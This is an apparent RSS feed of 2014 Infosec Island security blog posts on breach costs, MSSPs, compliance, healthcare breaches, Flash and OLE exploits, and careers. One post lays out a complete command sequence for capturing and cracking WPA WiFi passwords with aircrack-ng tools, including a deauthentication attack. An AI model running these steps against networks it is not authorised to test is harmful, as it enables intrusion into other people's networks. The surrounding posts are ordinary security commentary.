Infosec Island Latest Articles Adrift in Threats? Come Ashore! en hourly 1 Is There a Business Case in Planning for Data Breaches? Thu, 30 Oct 2014 10:13:30 -0500 By: Steven Ransom-Jones

When I was learning to fly, one of the many pearls of wisdom imparted to me by my instructor was, as I transitioned from pre-flight planning and considering a myriad of “what-if” scenarios to prevent problems, to actually going aloft was to mentally move to continually considering what to do “when” an event, such as an failure, eventually takes place.  The primary objective remained constant: to ensure a safe outcome with minimal consequences (you may call it applied risk management). 

This shift in attitude appears to be apt for custodians of information systems, moving from planning services and incident prevention to operational preparedness in order to best ensure a successful outcome in the event of an unplanned incident. Sadly, even with sophisticated layers of defense, many organizations are facing similar thought processes of what to do “when” a data breach takes place rather than “if”.  Staples looks like it is the next addition to the list of notable incidents that includes Target, Home Depot, Chase, Goodwill, Michaels and P.F. Chang’s.

The recent Ponemon Institute benchmark research “2014 Cost of Data Breach Study : United States” identified a number of factors that could materially affect the impact and cost of managing a data breach. Apart from the headline average cost of an incident of $5.4 million with a per record number rising to $201 there were some interesting observations relating to the root causes.

The involvement of a third party was one of the biggest contributors to the cost of managing a data breach, at 12.5% above the mean cost. There is ample indication that this is an extremely common situation that is developing rapidly with the adoption of computing and application services. As well as the HVAC issue that was a vector for the Target breach, incidents at Lowe’s, Goodwill and AutoNation earlier this year were attributed to third-party vendors (E-DriverFile, C&K Systems and Trademotion respectively).  The need for third party diligence has been identified as necessary by financial and healthcare regulators. If we look at the potential for loss avoidance, effective vendor security management that includes incident management makes good sense as both preventative and response measures.

The maturity of breach response plan represented another interesting opportunity to either increase or reduce the cost of a breach.  Typically organizations that provided quick, less coordinated announcements and response activities that did not follow a clear protocol experienced management costs 7% above the mean. On the other hand, those with a clear incident response plan reported average costs around 8.5% below the mean.  The difference in response approach represents over $830,000 in a $5.4 million event.  To return to the pilot analogy: preparedness training and the effective use of checklists have been proven to significantly improve the outcomes.

This was cross-posted from the Neohapsis blog.

Copyright 2010 Respective Author at Infosec Island]]>
On MSSP Personnel Thu, 30 Oct 2014 10:07:21 -0500 Unlike with an on-premise SIEM or even still-mostly-mythical SaaS/cloud SIEM, with an MSSP contract you are paying for people and not just for the tools. This obvious fact – that “S” in MSSP stands for “services” and service implies people – somehow escapes some organizations. Let’s explore this a bit here. If you pick an MSSP partner with an amazing technology platform and unskilled, frequently-churning, lazy, perversely-motivated (tickets closed per hour, anybody?) personnel with questionable ethics and lack of proficiency in your language of choice, do you think your security monitoring capability will…

  1. … succeed brilliantly
  2. fail EPICally
  3. … would be no worse than now
  4. … can go whatever way.

I think you get an idea :-) Now, some of you may, in good faith, choose option 3). Frankly, I was thinking of coming up with some joke about it – but became sad instead …

A wise CSO once told me that in order to outsource a security process (such as security monitoring or device management) and achieve a great result, you have to know precisely how a great process of that kind looks like. Indeed, how would you know that your MSSP runs a great SOC, if you have never even seen one? The same applies to people. So, if you never hired and managed great security analysts, how would you know that your MSSP partner actually employs them? Sure, when you buy products you can rely on our research, the views of your peers or whatever other factors, but such methods are much harder for people and process aspects of your future MSSP relationship. So, I am sorry to break the news here, but thinking is involved!

One quality MSSP provider told me that his favorite MSSP client is one that knows exactly how an excellent security operations capability looks like (such as from his previous job, etc), but also knows that he cannot get one (no chance to hire, needs it faster than his can grow, etc, etc). This makes perfect sense: it is easier to conceptualize and understand a mature security monitoring operation than to actually have one materialize in your organization. Thus, if you know how one looks, you may be able to get that from that MSSP partner.

But back to people – in essence, you need to spend time learning:

a) how does a great security analyst look like?

b) whether your chosen MSSP partner has them?

c) whether they will be assigned to your account?

Otherwise, that MSSP may be cheap – rather than cost-effective. You want economies of scale in monitoring, not cheap crap in monitoring. And it is also your responsibility to understand the difference! So, learn about the security skill sets and relevant certifications, and then about whether the MSSP has them, and also whether their people have real experience fighting threats [and winning, at least occasionally :-)] and then continue checking whether that is still true as your relationship continues…

Finally, how was your experience with MSSP personnel?

This was cross-posted from the Gartner blog.

Copyright 2010 Respective Author at Infosec Island]]>
Compliance-Based Infosec Vs Threat-Based Infosec Wed, 29 Oct 2014 13:52:10 -0500 In the world of Information Security (infosec), there are two main philosophies: compliance-based infosec and threat-based infosec. Compliance-based infosec means meeting a set of written security standards designed to fulfill some goal such as the requirements of statute law or financial information privacy requirements. Threat-based infosec, on the other hand, means applying information security controls in reaction to (or anticipation of) threats that organizations currently (or soon will) face. 

Compliance-based infosec is generally applied smoothly across the organization. In other words, all the security controls mandated in the security standard must be put in place by the organization, and the relative effectiveness of each control is largely ignored. In contrast, security controls are applied in a hierarchical manner in threat-based infosec. The most effective or greatly needed security controls are applied first according to the threats that are most likely to occur or that will cause the most damage to the organization if they do occur. 

The difference is sort of like the defensive strategy of the Chinese versus that of the Normans in post-conquest England. The Chinese built very long walls that went from one end of their territory to the other. Their goal was to keep out all invaders everywhere. This is a grand idea, but takes a very large amount of resources to implement and maintain. In practice, it takes tons of men and infrastructure and the defensive capabilities at any one place are spread thin. The Normans in England, on the other hand, built strong castles with many layers of defense in strategic locations where the threats were greatest and where it was easiest to support neighboring castles. In practice, there are fewer defenses at any one point, but the places where defenses are implemented are very strong indeed. Both of these strategies have merit, and are really driven by the particular set of circumstances faced by the defender. But which is better for your organization? Let’s look at compliance-based infosec first.

Compliance-based infosec, when implemented correctly, is really the best kind of defense there is. The problem is, the only place I’ve ever seen it really done right is in the military. In military information security, failure to protect private information can lead to death and disaster. Because of this, no expense or inconvenience is spared when protecting this information. Everything is compartmentalized and access is strictly based on need to know. Every system and connection is monitored, and there are people watching your every move. There are rules and checklists for everything and failure to comply is severely punished. In addition, finding better ways to protect information are sought after, and those that come up with valuable ideas are generously rewarded.

This is not the way compliance-base infosec works in the private sector, or even in non-military government agencies. First, statute law is tremendously vague when discussing implementing information security. Laws make broad statements such as “personal health information will be protected from unauthorized access or modification”. Fine. So a group of people get together and write up a body of regulations to further spell out the requirements organizations need to meet to comply with the law. Unfortunately, you are still dealing with pretty broad brush strokes here. To try to get a handle on things, agencies and auditors rely on information security standards and guidelines such as are documented in NIST or ISO. From these, baseline standards and requirements are set down.

The problems here are many. First, baseline standards are minimums. They are not saying “it’s best if you do this”, they are saying “you will at least do this”. However, typical organizations, (which generally have very limited infosec budgets), take these baseline standards as goals to be strived for, not starting points. They very rarely meet baseline standards, let alone exceed them. Also, NIST and ISO standards are not very timely. The standards are only updated occasionally, and they are not very useful for countering new and rapidly developing threats. So, unless your organization is really serious about information security and has the money and manpower to make it work, I would say compliance-based infosec is not for you. I know that many organizations (such as health care and financial institutions) are required to meet baseline standards, but remember what happened to Target last year. They were found to be compliant with the PCI DSS, but still had tens of millions of financial records compromised.

Now let’s look at threat-based infosec. To implement a threat-based information security program, the organization first looks at the information assets they need to protect, the threats and vulnerabilities that menace them and the consequences that will ensue if those information assets are actually compromised (basic asset inventory and risk assessment). They then prioritize the risks they face and decide how to implement security controls in the most effective and efficient way to counter those particular risks. That might mean implementing strong egress filtering and log monitoring as opposed to buying the fanciest firewall. Or it might mean doing something simple like ensuring that system admins use separate access credentials for simple network access and administrative access to the system. Whatever controls are applied, they are chosen to solve particular problems, not to meet some broad baseline that is designed to meet generally defined problems. Also, threat-based infosec programs are much better at anticipating and preparing for emerging threats, since reassessments of the security program are made whenever there are significant changes in the system or threat picture.

These are the reasons that I think most of us in non-military organizations should go with threat-based infosec programs. Even those organizations that must meet regulatory requirements can ensure that they are spending the bulk of their infosec money and effort on the effective controls, and are minimizing efforts spent on those controls that don’t directly counter real-world threats. After all, the laws and regulations themselves are pretty vague. What counts in the long run is real information security, not blind compliance with inadequate and antiquated baselines. 

Thanks to John Davis for this post.

This was cross-posted from the MSI State of Security blog.

Copyright 2010 Respective Author at Infosec Island]]>
Cracking Wifi Passwords With Kali Linux Wed, 29 Oct 2014 12:42:00 -0500 I haven’t really done a technical walkthrough type video and I now remember why I never did. These things are hard to do and involve two of my least favourite elements of video-making, screen captures and voiceovers. Which is why I always tip my hat to Vivek and his great tutorials over at

The idea behind this video was one of those posts on Facebook where a ‘clever’ parent changes the WiFi password and blackmails the child into first doing homework and chores before being able to access the net.

In the video, I kind of glossed over some steps and was a bit quick, so for completeness here are the commands you need once you get Kali up and running and have an injection-capable wireless adapter.

1. airmon-ng (will list all wireless cards)
2. airmon-ng start wlan0 (or whatever your wireless card is – it will start monitor mode mine was mon0)
3. airodump-ng mon0
4. Ctrl+C (once you see the network you want to connect to.
5. Airodump-ng -c [channel] -bssid [bssid] -w /root/Desktop/Catch mon0 (replace channel and bssid accordingly)
6. Open a second terminal window
7. aireplay-ng -0 2 -a [router bssid] -c [client bssid] mon0
8. You should see the message that you’ve captured the handshake so hit Ctrl+C
9. aircrack-ng -a2 -b [router bssid] -w[path to dictionary] /root/Desktop/*.cap
10. That’s it – you should have captured the password, if it’s in the dictionary you downloaded.

Like any security testing, I need not remind you that these kinds of tests should only be done on equipment you own or have permission to test.

Now, in reality, pulling something like this off isn’t very difficult. In under a dozen commands you can potentially grab a wifi password, which is script kiddie territory. The real question goes a lot deeper what can be done with this information? What other information is within the .CAP file? Can this be automated and chained? How can this scenario be run in different ways from an attacker perspective – and also how can you use this knowledge to build better defences?

This was cross-posted from the J4VV4D blog.



Copyright 2010 Respective Author at Infosec Island]]>
Healthcare Data Today: In Motion or Out of Control? Tue, 28 Oct 2014 12:26:16 -0500 From October 2009 through the present day, one industry alone has reported 900 different breaches. And none of those 900 were limited in their scope – in each, at least 500 individuals were affected. Who knows how many other smaller breaches happened, without public knowledge.

The industry we’re describing probably isn’t any of the ones you might guess – maybe retail or financial services – it’s the healthcare industry. And we can be absolutely certain that the numbers really are this high because the healthcare providers are required by law to disclose any breach affecting 500 or more individuals.

Since the HITECH Act of 2009, the U.S. has been grappling with how best to adopt new technology like electronic health records and telemedicine tools. The challenge is always to walk the line between improving patient care, without jeopardizing patient privacy.

For that reason, the Department of Health and Human Services is now responsible for reporting breaches to the public. It doesn’t matter whether the breach is the result of negligence involving an inadequate remote access policy or the theft of a laptop – all major incidents are reported. Healthcare information is particularly valuable to attackers because it can lead to even more lucrative data, such as bank account information or prescriptions that can be used to obtain controlled substances.

Yet, these incidents involving healthcare providers aren’t the ones making national headlines. Usually, widespread public panic involving network security is reserved for high-profile breaches of retailers and financial providers instead.

The silver lining is that every time another Target or Home Depot is attacked, retailers are again reminded that they could be next in the crosshairs. Their response is to reinforce their defenses. And as we know, hackers are persistent, but they’re still governed by human nature. They will aim for the path of least resistance – there’s little reason for them to try, and potentially fail, to attack an on-notice retailer, if an unaware, vulnerable healthcare provider is also in the picture.

That’s why the FBI put healthcare providers on notice back in April, with a warning that they could be especially vulnerable to cyberattacks. The FBI said that the healthcare industry is not as “resilient” to cyberattacks, despite how much damage they could cause.

That’s in part why three government agencies – the U.S. Food and Drug Administration, and the Departments of Health and Human Services and Homeland Security – hosted a public workshop on October 21-22 to “catalyze collaboration,” as a means to improve medical device cybersecurity.

That information session helped bring these issues to the forefront, but ultimately, when it comes to healthcare network security and keeping “data in motion” safe, the responsibility rests primarily with individual providers.

Healthy Patients, Healthy Network Security

One such provider is American Hospice, which calls a secure communications environment a “cornerstone” of its mission to care for patients. For a national care provider like American Hospice, whose 180 home healthcare workers treat more than 1,500 patients, secure remote access is essential.

American Hospice employees need to be able to safely and quickly update files while on the road. It’s not just about meeting HIPAA requirements involving privacy – it’s about improving worker productivity (by removing manual, paper-based processes), reducing operating costs and protecting sensitive patient information, as well as its own IT system integrity.

In May 2010, American Hospice turned to a Secure Enterprise VPN solution and gained all of these benefits. Workers are now able to safely and remotely access the network through secure mobile devices, allowing them to keep the main office updated, in near real-time.

The goal of all healthcare providers ought to be safer care for patients and peace of mind for their families, and thanks to its secure remote access capabilities, American Hospice has finally reached that point.

This was cross-posted from the VPN Haus blog.

Copyright 2010 Respective Author at Infosec Island]]>
On MSSP SLAs Tue, 28 Oct 2014 11:19:12 -0500 Is 15 minutes a mere instant or an eternity? Is getting an alert 15 minutes after it was first generated fast enough? And the opposite question: is 15 minutes of MSSP-side alert triage enough to make sure that the alert is relevant, high-priority and high-fidelity?

Indeed, spending too little time leads to poor quality alerts, but spending too much time on quality alerts leads to the attacker achieving their goals before the alert arrives and is acted upon.

So, yes, I did speak with one MSSP client who said that “15 minutes is too late for us” and another who said that “an MSSP cannot do a good job qualifying an alert in a mere 15 minutes” (both quotes fictional, but both “inspired by a real story”).

The answer to this – frankly not overly puzzling – question is again security operations maturity. On one end of the spectrum we have folks who just “don’t do detection” and rely on luck, law enforcement and unrelated third parties for detection (see this for reference). On the other, we have those with ever-vigilant analysts, solid threat intel and hunting activities for discovering the attackers’ traces before the alerts even come in.

As we learned before, security chasm is very strong in this area.

Therefore, a meaningful MSSP SLA discussion cannot happen without the context of your state of security operations.

For example, if you …

  1. … have no operation to speak of and plan to hire an intern to delete alerts? You can accept any alert SLA, [SAVE MONEY!!! GET YOUR ALERTS BY SNAIL MAIL! CARRIER PIGEON OK TOO! :-)] whether it is at the end of the day, or even a week. If you have no plan to ever act on a signal, a discussion of the timing of action is senseless.
  2. … can act on alerts when really needed, and will probably scramble a response if something significant happens? Look for a few hours or similar timing, and limit alerts to truly critical, “incident-ready” ones.
  3. … have a defined security monitoring/response function that is equipped to handle alerts fast? Aim at up to an hour for significant alerts and others maybe at the end of the day.
  4. … possess a cutting-edge security response operation? Push your MSSP partner to 15 minutes or less – for the best chance to stop the attacker in his tracks. Set up a process to review and process alerts as they come, and refine the rules on the fly. Respond, rinse, repeat, WIN!

The key message is: you don’t want to pay for speed that you won’t be able [or don’t plan] to benefit from. If security alerts will sit in inboxes for hours, you don’t need them delivered in minutes.

Now, what about the SLAs for various management services, such as changing NIDS rules and managing firewalls? SLAs play a role here as well, and – you guessed it – what you need here also depends on the maturity of your change management processes… Some people complain that an MSSP is too slow with updates to their security devices, while others know that MSSP does it faster than they can ever do it.

This was cross-posted from the Gartner blog.


Copyright 2010 Respective Author at Infosec Island]]>
Distinguishing Acts of War in Cyberspace Mon, 27 Oct 2014 11:36:03 -0500 Determining an act of war in the traditional domains of land, sea, and air often involves sophisticated interactions of many factors that may be outside the control of the parties involved. This monograph seeks to provide senior policymakers, decisionmakers, military leaders, and their respective staffs with essential background on this topic as well as introduce an analytical framework for them to utilize according to their needs.

It develops this theme in four major sections:

1. it presents the characterization of cyberspace to establish terms for broader dialogue as well as to identify unique technical challenges that the cyberspace domain may introduce into the process of distinguishing acts of war. 

2. it explores assessment criteria involved with assaying cyber incidents to determine if they represent aggression and possible use of force; and if so, to what degree? 

3. it looks at the policy considerations associated with applying such criteria by examining relevant U.S. strategies as well as the strategies of other key countries and international organizations, and considers how nonstate actors may affect U.S. deliberations. 

4. it examines the influences that course of action development and implementation may have on the assessment of cyberspace incidents, such as reliable situational awareness, global and domestic environment considerations, and options and their related risks and potential consequences. It argues that the United States must also expect and accept that other nations may reasonably apply the criteria we develop to our own actions in cyberspace.

In conclusion, this monograph examines the question of what constitutes an act of war, or aggression, in the cyberspace domain. The author also provides a set of recommendations to US policymakers to help them better understand and mitigate the fog and friction surrounding the distinction of acts of war in cyberspace.

Download the monograph here:  

This was cross-posted from here.

Copyright 2010 Respective Author at Infosec Island]]>
NIST warns on Zero-Day flaw in Samsung FindMyMobile Mon, 27 Oct 2014 11:32:05 -0500 The National Institute of Standards and Technology is warning of the presence of a Zero-Day flaw in the Samsung FindMyMobile service.

The US-CERT/NIST is warning of the presence of a zero-day flaw that affects the Samsung FindMyMobile web service (CVE-2014-8346). The Samsung FindMyMobile implements several features that allow users to locate the lost device, to play an alert on a remote device or to lock remotely the mobile phone.

“The Remote Controls feature on Samsung mobile devices does not validate the source of lock-code data received over a network, which makes it easier for remote attackers to cause a denial of service (screen locking with an arbitrary code) by triggering unexpected Find My Mobile network traffic.” states the security advisory issues by the NIST.

According to the NIST the Remote Controls feature implemented by the Samsung FindMyMobile fails to validate the sender of a lock-code data received over a network, an attacker could cause a denial of service remotely (screen locking with an arbitrary code) by triggering unexpected Find My Mobile network traffic.

The NIST rated the severity of the flaw in the Samsung FindMyMobile as HIGH, but the the exploitability subscore is 10.0, that is an index of the likelihood of exploitation.

Below a couple of video POCs:

 More info are available on the CVE Standard Vulnerability Entry for the CVE-2014-8346 flaw.

This was cross-posted from the Security Affairs blog.

Copyright 2010 Respective Author at Infosec Island]]>
Webcast: How Gaps In SSH Security Create an Open Door for Attackers Mon, 27 Oct 2014 08:17:49 -0500 Please join us on Thursday, Oct. 30th at 1PM ET for a special webcast: Gaps In SSH Security Create an Open Door for Attackers, presented by Venafi.

Almost half of IT security professionals reported they experienced compromised or misused Secure Shell (SSH) keys in the last 24 months. The majority of the survey respondents rely on overburdened system administrators to self-govern their SSH keys. Unfortunately the result is ineffective security practices that leave the organization exposed.

Forrester Research, analyst, John Kindervag, emphasizes, “Two-thirds of IT security professionals do not perform the necessary checks for unauthorized use of SSH keys.”

Forrester research exposing the state of SSH in most organizations. In this webinar, you will be provided with some recommendations how to mitigate the vulnerabilities that exist that exploit SSH keys and the gaps within an organization that leaves SSH keys vulnerable to these attacks.

Register Now


• Review the Forrester Research findings on the state of SSH in the enterprise network

• Learn what strategies need to be implemented to mitigate trust-based attacks

• Understand the risks of not mitigating trust-based attacks

PRESENTER: Gavin Hill – Director of Product Marketing & Threat Intelligence

Photo of Gavin Hill, Director of Product Marketing & Threat Intelligence at Venafi

With over a 15 years of experience in product development and product marketing in the cyber security space, Gavin Hill is particularly adept at identifying where enterprises are at risk and developing products that mitigate the risks related to evolving cyber threats. At Venafi he is responsible for the threat intelligence, focusing on Next-Generation Trust Protection and product marketing. Before working at Venafi, Gavin held a variety of leadership positions at Bitdefender and Trend Micro where he identified risks associated with data storage and workloads in the cloud. Under his direction, Bitdefender released a first to market AV as a service, and at Trend Micro developed another first to market product to encrypt data in the cloud while storing the encryption keys separate from the cloud provider.

Register Now

Copyright 2010 Respective Author at Infosec Island]]>
Cyber Security Careers: What You Need To Know To Advance In The Security Field Thu, 23 Oct 2014 14:32:00 -0500 By: David Bisson

National Cyber Security Awareness Month (NCSAM) has entered into its fourth week, introducing us into the topic of cyber security for small and medium-sized businesses and entrepreneurs.

SMBs are extremely vulnerable to cybercrime. Small businesses have embraced online transactions, but with limited budgets, many lack the resources to afford effective security measures, let alone the millions of dollars they would need to respond to a data breach.

Today, however, the need for businesses to invest in cyber security is essential for all companies. Large enterprises might be able to afford strong cyber protection but their massive customer base still makes them very lucrative targets. As we’ve seen with the recent network intrusions at JPMorgan Chase, Home Depot and Target, big corporations are not impossible to crack.

Ultimately, all businesses are in the same boat, but as we all know, technology only goes so far. Skilled people make the difference in protecting sensitive data, so it’s more critical than ever that public and private sectors begin training and hiring cyber security professionals.

Are you considering a career in cyber security? Here is what various industry professionals had to share about how to find your place in the field, make the most out of your profession and help protect companies’ sensitive information

A Wide Career Path

shutterstock_27596383Chris Conacher, Manager of Security and Compliance Solutions at Tripwire, knows the layout of the cyber security field quite well, including how far the industry has come.

“When I started out, there were no certifications or related education and only the government and its contractors had specific security roles,” said Conacher. “Nowadays, there is a whole career path from entry-level all the way up to executive-level, which is great.”

Professionals in the field have a variety of career options and specializations available to them. You can be in operations, systems engineering, development, architecture, or testing and there is an established third-party service model, so it’s easy to create your own company and get work,” said Conacher.

In addition to the diversity of professions, careers in cyber security also range across numerous industry sectors. “If you want to be left alone in a dark room developing tools or finding exploits, there are people who will pay for that,” said Jason Waterman, who leads the Cyber, Information and IT Security Practice at Badenoch & Clark. “And if you want to be out as an evangelist, meeting people and speaking at conferences, there are people who will pay for that, as well.”

Just remember that each path usually comes with its own certification requirements. General credentials, such as CompTIA Security+ or the Certified Information Systems Security Professional (CISSP), are likely to apply but vendor-specific certifications may also be required. Simon Hember, MD and Owner of Acumin Consulting, adds, “Like with many professions, gaining relevant qualifications, such as a CISSP or CISM, is as important as gaining ‘hands on’ experience to build a solid foundation.”

Cyber Security is Indispensable to Businesses

The danger of being breached is an ever-present concern, so as companies continue to integrate with the global economy and expand, more and more will recognize the necessity of implementing strong cyber security measures. This means that cyber security careers will multiply. In fact, Forbes reported last summer that the field is expected to grow tenfold in the next decade.

“Not only will professionals be at a premium and therefore, be rewarded accordingly but they will also be at the cutting edge of business and technology decisions across all industries,” adds Waterman. “No company, no matter the size or industry, is immune to a cyber breach and every business must be prepared.”

Curiosity and Communication as Critical Skills

shutterstock_218895625Cyber security professionals will succeed in the field if they have two traits: inquisitiveness and an ability to communicate with others.

Problem-solving is at the heart of cyber security, so experts in the field need to have a willingness to dig deep into vulnerabilities and develop creative solutions, says Conacher: “I got into security because I enjoyed puzzles, taking things apart and understanding how things work. If you can combine this inquisitiveness with a level of discipline around how you approach problems and implement solutions, you will do well.”

Another important trait is the ability to communicate with others, especially since many people in the industry don’t speak the highly technical language. Therefore, it’s imperative that cyber security professionals can explain the value of their security efforts and how it benefits the overall business.

“The ability to effectively convey your message to peers of all levels will be increasingly important as many employees still are not aware of simple steps to help avoid breaches,” explains Waterman. “Often candidates and clients I deal with stress the importance of this skill set, which will have a direct impact on how far you can take your career.”

Other skills, including an ability to analyze data and experience in project management, are also useful depending on the nature of the work involved.

A Bright Future Ahead

Reflecting the diverse cyber threats in existence today, the field of cyber security is full of opportunities. If that weren’t enough, there are a number of changes that may happen in the near future. As Waterman predicts, “Over the next five years, I can see more C-Level positions being created for cyber professionals and the role of the CISO developing into an ever-increasing board room role.”

“My hope is that a more visible CISO and security policy will increase the interest in this subject… [which] will create more opportunities at an industry level for companies to build strong and skilled cyber aware work forces.”

Meanwhile, Hember sees an imminent growth in the number of cyber security start-ups: “We’re also seeing a lot of significant funding rounds in the vendor community, so opportunities to get involved in exciting—and often disruptive—start-up companies in both technical and commercial roles can also offer an exciting career path.”

Given the versatility, indispensability to business and promises for the future, cyber security is whatever professionals decide to do with it. As Conacher notes, “security is the one career where the sky is the limit; professionals are limited only by their ambition and their imagination.”

That is fortunate to hear. To face all the cyber threats confronting us today, we need all the help we can get.

This was cross-posted from the State of Security blog.

Copyright 2010 Respective Author at Infosec Island]]>
Cyber-Criminals Quickly Adopt Critical Flash Player Vulnerability Thu, 23 Oct 2014 11:30:08 -0500 Keeping your computer up-to-date is probably one of the best pieces of advice one can give when it comes to online security.

Perhaps it should also be emphasized that patches ought to be applied in a timely fashion.

Case in point, less than a week ago, a critical flaw in the Flash Player (CVE-2014-0569) was patched and made public:


The vulnerability had been privately reported to Adobe through the Zero Day Initiative group giving the firm the time to fix the issue before it became known to the world.

Typically security researchers and criminals will be very attentive to such news and skilled reverse engineers will start looking at the patch to be able to reconstruct the exploit. All things considered, there is normally a certain amount of time before a proof of concept is released and then a little more time before that poc is weaponized by the bad guys.

You can imagine how surprised Kafeine was when he stumbled upon that same CVE in a real world exploit kit (Fiesta EK) only one week after the official security bulletin had been published!

Although this is not a zero day, one can imagine that there was a strong and urgent interest in exploiting this vulnerability in the wild.

That means we have less and less time to deploy and test security patches. Perhaps this is not too much of a deal for individuals, but it can be more difficult for businesses which need to roll out patches on dozens of machines, hoping doing so will not cause malfunctions in existing applications.

In any case, this was our first chance to test CVE-2014-0569 in the wild by triggering the Fiesta EK against Malwarebytes Anti-Exploit:


The server sends down the exploit landing page quickly followed by the new Flash exploit which is successfully blocked by Anti-Exploit.

We also observed another Flash exploit (we are not sure about which CVE is targeted yet, only that is was patched a week ago also) in the Angler EK:


It is crucial to patch any system running outdated Flash Player versions as soon as possible!

You can check the version you are running (make sure to do this in all the browsers you use) by going here.

To download the latest version click here (don’t forget to uncheck the pre-selected options to download toolbars or other Potentially Unwanted Programs AKA PUPs):


Browsing the Net on an unpatched computer is like playing the Russian roulette with a handful of loaded guns: “do you feel lucky?”.


The first payload you get hit with is the infamous fileless malware also known as Bedep which enrolls you inside of a botnet:


Malwarebytes Anti-Malware detects the initial payload as Trojan.FakeMS.ED.

As they say, the rest is history, with more malware being downloaded and yet another machine ready to send out spam once it has been pick pocketed.

The bad guys are not going to run short of vulnerabilities they can weaponize at a quicker rate than ever before. This leaves end-users with very little room for mistakes such as failing to diligently apply security patches sooner rather than later.

Many thanks go to Kafeine for providing additional data on CVE-2014-0569. Feel free to read his original post here.

This was cross-posted from the Malwarebytes blog.

Copyright 2010 Respective Author at Infosec Island]]>
New Zero-day in Microsoft OLE Being Exploited in Targeted Attacks Wed, 22 Oct 2014 13:28:25 -0500 Security experts at Google and McAfee have discovered a new zero-day vulnerability in Microsoft OLE being exploited in targeted attacks.

Early this week,  Microsoft issued the security advisory 3010060 to warn its customer of a new Zero-Day vulnerability that affects all supported versions of Windows OS except, Windows Server 2003.

The OLE Packager is the component that is affected by the zero-day, which was discovered by researchers at McAfee and Google. Curiously the component was just patched this month in MS14-060, but Microsoft, in response to this latest flaw, has released a Fix It package for PowerPoint and encouraged the use of EMET 5.0.

The most concerning thing related to the Microsoft zero-day flaw is that it is already being exploited by threat actors in targeted attacks.

“The vulnerability could allow remote code execution if a user opens a specially crafted Microsoft Office file that contains an OLE object. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user,” the advisory explained.”At this time, we are aware of limited, targeted attacks that attempt to exploit the vulnerability through Microsoft PowerPoint.” confirming the voice that bad actors are already exploiting the zero-day in limited cases.

The OLE (Object Linking and Embedding) is a proprietary technology developed by Microsoft that allows embedding and linking to documents and other objects. As explained by the experts at Microsoft, the vulnerability in Microsoft OLE, coded as CVE-2014-6352, could allow remote code execution. This is possible if a Microsoft user opens a specially crafted Microsoft Office file that contains an OLE object.

The file could be sent via email to the victims in a classic spear-phishing attack or the attacker could serve it through a compromised website in a classic watering hole attack.

The security advisory reports the following mitigation factors:

  • In observed attacks, User Account Control (UAC) displays a consent prompt or an elevation prompt, depending on the privileges of the current user, before a file containing the exploit is executed. UAC is enabled by default on Windows Vista and newer releases of Microsoft Windows.
  • An attacker who successfully exploited this vulnerability could gain the same user rights as the current user. Customers whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.
  • In a web-based attack scenario, an attacker could host a website that contains a webpage that contains a specially crafted Office file that is used to attempt to exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these websites. Instead, an attacker would have to convince users to visit the website, typically by getting them to click a link in an email message or Instant Messenger message that takes users to the attacker’s website.
  • Files from the Internet and from other potentially unsafe locations can contain viruses, worms, or other kinds of malware that can harm your computer. To help protect your computer, files from these potentially unsafe locations are opened in Protected View. By using Protected View, you can read a file and see its contents while reducing the risks. Protected View is enabled by default.

The principal problem is that despite the exploit of the flaw trigger a warning, users often ignore them, the issue appears very serious in corporate environments, where executives and remote users are often granted administrative rights on their systems.

This was cross-posted from the Security Affairs blog.

Copyright 2010 Respective Author at Infosec Island]]>
6 Actions Businesses Should Take During Cyber Security Awareness Month Wed, 22 Oct 2014 11:24:04 -0500 October is National Cyber Security Awareness Month. It would seem the breaches announced virtually every day of this  month so far were orchestrated to highlight the need for organizations to beef up their information security efforts and improve their controls.

Sadly instead, cyber incidents seem to have become de rigueur these days. Consumers are getting fed up, and government agencies are proposing more laws. The tide is turning, and soon organizations will be held accountable for more effectively protecting their systems and information, or they will likely face much steeper fines and penalties than ever before. So, now’s the time to take action! Here are six actions you to take this month to start improving your organization’s information security program and associated efforts.

1.    Review your authentication methods.

When was the last time you updated the way your legacy and older systems and applications authenticate user accounts? Do you still use just a password, that isn’t required to be strong? Do you engineer new systems and applications using these same weak methods? Now is the time to improve your authentication methods.

TO DO: Implement two-step authentication wherever possible and require strong passwords.

2. Apply security updates to all your systems and applications.

Are you up-to-date with all your security patches and systems updates? Cyber crooks look for systems that have old vulnerabilities. Plus, those vulnerabilities can allow bad things to happen as a result of mistakes and interactions with other applications and systems. You are a digital sitting duck if you don’t stay on top of security updates. Case in point: Have you updated your OpenSSL to remove the Heartbleed vulnerability? Do it now!

TO DO: Update your systems to the most recent version and apply all appropriate security patches available.

3.     Give your personnel training and awareness communications.

People are not born with an innate sense of how to secure information. Your information security and privacy policies, and related necessary work activity information, are not transmuted to them through osmosis. Too bad the majority of business leaders seem to not realize this given the abhorrent lack of good information security and privacy training, and awareness communications, within organizations. You must provide effective training as well as provide ongoing awareness communications so they know how to incorporate effective information protection practices within their daily job activities. Just consider this: one recent study found that 57% of privacy breaches are caused by insiders, most of whom simply made mistakes, or did things not knowing that it would put information at risk. These could have been prevented with good education.

TO DO: Give good and effective information security and privacy training to ALL your employees, and send them ongoing reminders and other types of awareness communications.

4. Do a security and privacy audit.

Do you just assume that all your privacy and security controls are enough and working just fine? Do you assume that all security and privacy risks have been appropriately mitigated? If your answer is yes, is this because you have confidence following a recent (as in the past few months) risk assessments? If you’re making these assumptions based upon old risk assessments, or through blind trust in the absence of risk assessments, then you are putting your organization at great risk of becoming the next cybersecurity breach incident to be in the headlines. You need to do risk assessments regularly. The more time from a risk assessment, the more the business has changed, and potentially had new risks created.

TO DO: Do regular information security and privacy risk assessments and mitigate the discovered risks appropriately.

5.    Make your security and privacy practices transparent.

Do you have a privacy notice and information security policy posted on your website? Does it accurately reflect the current practices of your organization? Do your employees know what they say? Do their work activities support what the statements and policies say?

TO DO: Create a clear, accurate and easy to understand web site privacy practices statement and information security policy. Keep them updated to reflect changes in your organization’s practices.

6.    Find out what your contracted third parties are doing.

When you entrust contracted third parties to access your data, and all forms of information, and the associated systems and physical locations, you retain a level of responsibility for the actions of those third parties. Do they have an effective information security and privacy and security program in place? You need to vet and maintain a level of oversight for your third parties and their security and privacy practices. If they have a privacy breach or security incident, you will ultimately be held responsible in some manner.

TO DO: Ask your third parties to provide you with the results of a recent risk assessment; high level to get something started and to get quick results if they don’t have a recent risk assessment report available. Then establish ongoing oversight of your third parties’ information security and privacy practices.

Bottom line for organizations of all sizes…

